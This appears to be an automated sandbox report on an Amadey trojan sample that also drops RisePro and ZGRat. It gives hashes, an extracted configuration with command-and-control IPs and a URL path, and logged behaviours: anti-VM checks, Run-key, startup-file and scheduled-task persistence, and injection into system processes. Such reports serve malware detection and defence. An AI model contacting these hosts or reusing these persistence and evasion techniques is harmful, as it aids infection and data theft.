amadey | a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948

Analysis

max time kernel
150s
max time network
152s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
15-05-2024 12:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe
Size

1.5MB
MD5

32187c18a470b54095365f8db359a671
SHA1

3ce7f687006e176a5b1554e30decdfed60e35aae
SHA256

a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948
SHA512

a9873b6ac3f480ad881bee4fe52d960127696f816007ee1ed4a2511ff82f7cc10ec98ef16cdc2869b49b716d3453ee6a7d952a1988083d046ba05dd9d579449a
SSDEEP

24576:92vbP2LX8eT+onZIeV1B/0ZGP5Ulz9xw0i0sx9rNqdy5/rwjXUx68BFrgPUv:9kyweTrZIQ8o2z9ST089BqurwLI7vMcv

Score

10^/10

amadey risepro zgrat evasion persistence rat stealer themida trojan

Malware Config

Extracted

Family

amadey

Version

4.20

http://5.42.96.141

http://5.42.96.7

Attributes

install_dir
908f070dff
install_file
explorku.exe
strings_key
b25a9385246248a95c600f9a061438e1
url_paths
/go34ko8/index.php

rc4.plain

Extracted

Family

risepro

147.45.47.126:58709

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 20 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2820-111-0x0000000006820000-0x0000000006A60000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-115-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-114-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-123-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-121-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-132-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-149-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-147-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-145-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-143-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-141-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-139-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-137-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-136-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-133-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-125-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-119-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-117-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-129-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/2820-127-0x0000000006820000-0x0000000006A5A000-memory.dmp	family_zgrat_v1

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 3364 created 636 3364 powershell.EXE winlogon.exe
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

description	pid	process	target process
PID 3364 created 636	3364	powershell.EXE	winlogon.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

axplons.exea3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exeaxplons.exe18571080f2.exeaxplons.exeexplorku.exeexplorku.exeexplorku.exeamers.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	18571080f2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorku.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorku.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorku.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amers.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

axplons.exeaxplons.exe18571080f2.exeexplorku.exea3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exeamers.exeexplorku.exeaxplons.exeexplorku.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	18571080f2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	18571080f2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amers.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amers.exe

Drops startup file 1 IoCs

Processes:

Kaxhwswfup.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs Kaxhwswfup.exe
Executes dropped EXE 12 IoCs

Processes:

explorku.exeamers.exeaxplons.exe18571080f2.exeKaxhwswfup.exeaxplons.exeexplorku.exe$7760c8f0explorku.exe$772f9fd5axplons.exeexplorku.exe

pid process

2272 explorku.exe
4436 amers.exe
1936 axplons.exe
2824 18571080f2.exe
2820 Kaxhwswfup.exe
4304 axplons.exe
1044 explorku.exe
3368 $7760c8f0
1968 explorku.exe
4412 $772f9fd5
484 axplons.exe
1288 explorku.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs	Kaxhwswfup.exe

pid	process
2272	explorku.exe
4436	amers.exe
1936	axplons.exe
2824	18571080f2.exe
2820	Kaxhwswfup.exe
4304	axplons.exe
1044	explorku.exe
3368	$7760c8f0
1968	explorku.exe
4412	$772f9fd5
484	axplons.exe
1288	explorku.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

amers.exeaxplons.exeaxplons.exeaxplons.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine	amers.exe
Key opened	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine	axplons.exe

Themida packer 38 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/4972-0-0x00000000009D0000-0x0000000000EBC000-memory.dmp	themida
behavioral2/memory/4972-2-0x00000000009D0000-0x0000000000EBC000-memory.dmp	themida
behavioral2/memory/4972-3-0x00000000009D0000-0x0000000000EBC000-memory.dmp	themida
behavioral2/memory/4972-1-0x00000000009D0000-0x0000000000EBC000-memory.dmp	themida
behavioral2/memory/4972-5-0x00000000009D0000-0x0000000000EBC000-memory.dmp	themida
behavioral2/memory/4972-6-0x00000000009D0000-0x0000000000EBC000-memory.dmp	themida
behavioral2/memory/4972-7-0x00000000009D0000-0x0000000000EBC000-memory.dmp	themida
behavioral2/memory/4972-4-0x00000000009D0000-0x0000000000EBC000-memory.dmp	themida
behavioral2/memory/4972-8-0x00000000009D0000-0x0000000000EBC000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe	themida
behavioral2/memory/4972-21-0x00000000009D0000-0x0000000000EBC000-memory.dmp	themida
behavioral2/memory/2272-22-0x0000000000810000-0x0000000000CFC000-memory.dmp	themida
behavioral2/memory/2272-30-0x0000000000810000-0x0000000000CFC000-memory.dmp	themida
behavioral2/memory/2272-27-0x0000000000810000-0x0000000000CFC000-memory.dmp	themida
behavioral2/memory/2272-26-0x0000000000810000-0x0000000000CFC000-memory.dmp	themida
behavioral2/memory/2272-29-0x0000000000810000-0x0000000000CFC000-memory.dmp	themida
behavioral2/memory/2272-28-0x0000000000810000-0x0000000000CFC000-memory.dmp	themida
behavioral2/memory/2272-24-0x0000000000810000-0x0000000000CFC000-memory.dmp	themida
behavioral2/memory/2272-25-0x0000000000810000-0x0000000000CFC000-memory.dmp	themida
behavioral2/memory/2272-23-0x0000000000810000-0x0000000000CFC000-memory.dmp	themida
behavioral2/memory/2272-64-0x0000000000810000-0x0000000000CFC000-memory.dmp	themida
C:\Users\Admin\1000006002\18571080f2.exe	themida
behavioral2/memory/2824-83-0x0000000000CB0000-0x0000000001326000-memory.dmp	themida
behavioral2/memory/2824-85-0x0000000000CB0000-0x0000000001326000-memory.dmp	themida
behavioral2/memory/2824-86-0x0000000000CB0000-0x0000000001326000-memory.dmp	themida
behavioral2/memory/2824-87-0x0000000000CB0000-0x0000000001326000-memory.dmp	themida
behavioral2/memory/2824-84-0x0000000000CB0000-0x0000000001326000-memory.dmp	themida
behavioral2/memory/2824-90-0x0000000000CB0000-0x0000000001326000-memory.dmp	themida
behavioral2/memory/2824-91-0x0000000000CB0000-0x0000000001326000-memory.dmp	themida
behavioral2/memory/2824-89-0x0000000000CB0000-0x0000000001326000-memory.dmp	themida
behavioral2/memory/2824-88-0x0000000000CB0000-0x0000000001326000-memory.dmp	themida
behavioral2/memory/2272-4273-0x0000000000810000-0x0000000000CFC000-memory.dmp	themida
behavioral2/memory/1044-5011-0x0000000000810000-0x0000000000CFC000-memory.dmp	themida
behavioral2/memory/1044-5019-0x0000000000810000-0x0000000000CFC000-memory.dmp	themida
behavioral2/memory/2824-5024-0x0000000000CB0000-0x0000000001326000-memory.dmp	themida
behavioral2/memory/1968-5679-0x0000000000810000-0x0000000000CFC000-memory.dmp	themida
behavioral2/memory/1968-5743-0x0000000000810000-0x0000000000CFC000-memory.dmp	themida
behavioral2/memory/1288-5788-0x0000000000810000-0x0000000000CFC000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

explorku.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\18571080f2.exe = "C:\\Users\\Admin\\1000006002\\18571080f2.exe"	explorku.exe

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

explorku.exe18571080f2.exeexplorku.exeexplorku.exea3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorku.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	18571080f2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorku.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorku.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe

Drops file in System32 directory 5 IoCs

Processes:

powershell.EXEsvchost.exeOfficeClickToRun.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

amers.exeaxplons.exeaxplons.exeaxplons.exe

pid process

4436 amers.exe
1936 axplons.exe
4304 axplons.exe
484 axplons.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

Kaxhwswfup.exepowershell.EXE

description	pid	process	target process
PID 2820 set thread context of 3368	2820	Kaxhwswfup.exe	$7760c8f0
PID 3364 set thread context of 2252	3364	powershell.EXE	dllhost.exe
PID 2820 set thread context of 4412	2820	Kaxhwswfup.exe	$772f9fd5

Drops file in Windows directory 2 IoCs

Processes:

a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exeamers.exe

description ioc process

File created C:\Windows\Tasks\explorku.job a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe
File created C:\Windows\Tasks\axplons.job amers.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Tasks\explorku.job	a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe
File created	C:\Windows\Tasks\axplons.job	amers.exe

Modifies data under HKEY_USERS 55 IoCs

Processes:

powershell.EXEOfficeClickToRun.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715777985"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 15 May 2024 12:59:46 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={DA4A53E1-FE86-4F0F-B330-24C883B334B2}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

amers.exeaxplons.exeaxplons.exepowershell.EXEdllhost.exeKaxhwswfup.exe

pid	process
4436	amers.exe
4436	amers.exe
1936	axplons.exe
1936	axplons.exe
4304	axplons.exe
4304	axplons.exe
3364	powershell.EXE
3364	powershell.EXE
3364	powershell.EXE
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2820	Kaxhwswfup.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe
2252	dllhost.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

Kaxhwswfup.exepowershell.EXEdllhost.exe

description	pid	process
Token: SeDebugPrivilege	2820	Kaxhwswfup.exe
Token: SeDebugPrivilege	3364	powershell.EXE
Token: SeDebugPrivilege	3364	powershell.EXE
Token: SeDebugPrivilege	2252	dllhost.exe
Token: SeDebugPrivilege	2820	Kaxhwswfup.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

RuntimeBroker.exe

pid process

4000 RuntimeBroker.exe

pid	process
4000	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exeexplorku.exeamers.exeaxplons.exeKaxhwswfup.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 4972 wrote to memory of 2272	4972	a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe	explorku.exe
PID 4972 wrote to memory of 2272	4972	a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe	explorku.exe
PID 4972 wrote to memory of 2272	4972	a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe	explorku.exe
PID 2272 wrote to memory of 1968	2272	explorku.exe	explorku.exe
PID 2272 wrote to memory of 1968	2272	explorku.exe	explorku.exe
PID 2272 wrote to memory of 1968	2272	explorku.exe	explorku.exe
PID 2272 wrote to memory of 4436	2272	explorku.exe	amers.exe
PID 2272 wrote to memory of 4436	2272	explorku.exe	amers.exe
PID 2272 wrote to memory of 4436	2272	explorku.exe	amers.exe
PID 4436 wrote to memory of 1936	4436	amers.exe	axplons.exe
PID 4436 wrote to memory of 1936	4436	amers.exe	axplons.exe
PID 4436 wrote to memory of 1936	4436	amers.exe	axplons.exe
PID 2272 wrote to memory of 2824	2272	explorku.exe	18571080f2.exe
PID 2272 wrote to memory of 2824	2272	explorku.exe	18571080f2.exe
PID 2272 wrote to memory of 2824	2272	explorku.exe	18571080f2.exe
PID 1936 wrote to memory of 2820	1936	axplons.exe	Kaxhwswfup.exe
PID 1936 wrote to memory of 2820	1936	axplons.exe	Kaxhwswfup.exe
PID 1936 wrote to memory of 2820	1936	axplons.exe	Kaxhwswfup.exe
PID 2820 wrote to memory of 3368	2820	Kaxhwswfup.exe	$7760c8f0
PID 2820 wrote to memory of 3368	2820	Kaxhwswfup.exe	$7760c8f0
PID 2820 wrote to memory of 3368	2820	Kaxhwswfup.exe	$7760c8f0
PID 2820 wrote to memory of 3368	2820	Kaxhwswfup.exe	$7760c8f0
PID 2820 wrote to memory of 3368	2820	Kaxhwswfup.exe	$7760c8f0
PID 2820 wrote to memory of 3368	2820	Kaxhwswfup.exe	$7760c8f0
PID 2820 wrote to memory of 3368	2820	Kaxhwswfup.exe	$7760c8f0
PID 2820 wrote to memory of 3368	2820	Kaxhwswfup.exe	$7760c8f0
PID 2820 wrote to memory of 3368	2820	Kaxhwswfup.exe	$7760c8f0
PID 3364 wrote to memory of 2252	3364	powershell.EXE	dllhost.exe
PID 3364 wrote to memory of 2252	3364	powershell.EXE	dllhost.exe
PID 3364 wrote to memory of 2252	3364	powershell.EXE	dllhost.exe
PID 3364 wrote to memory of 2252	3364	powershell.EXE	dllhost.exe
PID 3364 wrote to memory of 2252	3364	powershell.EXE	dllhost.exe
PID 3364 wrote to memory of 2252	3364	powershell.EXE	dllhost.exe
PID 3364 wrote to memory of 2252	3364	powershell.EXE	dllhost.exe
PID 3364 wrote to memory of 2252	3364	powershell.EXE	dllhost.exe
PID 2252 wrote to memory of 636	2252	dllhost.exe	winlogon.exe
PID 2252 wrote to memory of 692	2252	dllhost.exe	lsass.exe
PID 2252 wrote to memory of 992	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 560	2252	dllhost.exe	dwm.exe
